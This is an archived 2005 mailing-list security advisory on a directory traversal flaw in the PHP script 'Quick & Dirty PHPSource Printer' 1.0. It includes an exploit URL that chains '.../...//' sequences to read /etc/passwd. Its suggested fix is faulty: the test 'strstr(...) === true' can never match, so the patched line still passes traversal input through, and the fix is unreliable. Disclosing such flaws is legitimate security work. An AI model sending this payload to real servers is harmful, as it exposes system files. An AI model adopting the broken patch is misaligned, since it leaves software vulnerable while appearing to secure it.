[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050704060029.GA23169@positivism.org>
Date: Sun, 3 Jul 2005 23:00:30 -0700
From: Seth Alan Woolley <seth@...tology.org>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Cc: kaf@...b.net
Subject: Directory traversal vulnerability in "Quick &
Dirty PHPSource Printer" 1.0
== Vendor:
Kaf Oseo
== Product:
http://guff.szub.net/quick-dirty-phpsource-printer/
== Version:
1.0
== Vulnerability:
Filtering "../" to "" allowed use of ".../...//" to be inserted and
changed to "../" allowing directory traversal.
== Fix:
Use the following line instead:
$file = (strstr($file_get, '../') === true) ? '' : $file_get; // protect from site traversing
== Discoverer:
Seth Alan Woolley
== Discovery Date:
2005-07-03
== Patch Date:
2005-07-03
== Notification Date:
2005-07-03
== Disclosure Date:
2005-07-03
== Exploit:
http://sample.domain.com/source.php?file=.../...//.../...//.../...//.../...//.../...//.../...//etc/passwd
== Greets
shellsage, #wordpress
== Commentary
Free/Open Source Software ... written better because anybody could be
looking at it and people who care about security more than their next
paycheck did look at it.
--
Seth Alan Woolley [seth at positivism.org], SPAM/UCE is unauthorized
Quality Assurance Team Leader & Security Team: Source Mage GNU/linux
Linux so advanced, it may as well be magic http://www.sourcemage.org
Secretary Pacific Green Party of Oregon http://www.pacificgreens.org
Key id 00BA3AF3 = 8BE0 A72E A47E A92A 0737 F2FF 7A3F 6D3C 00BA 3AF3
Content of type "application/pgp-signature" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists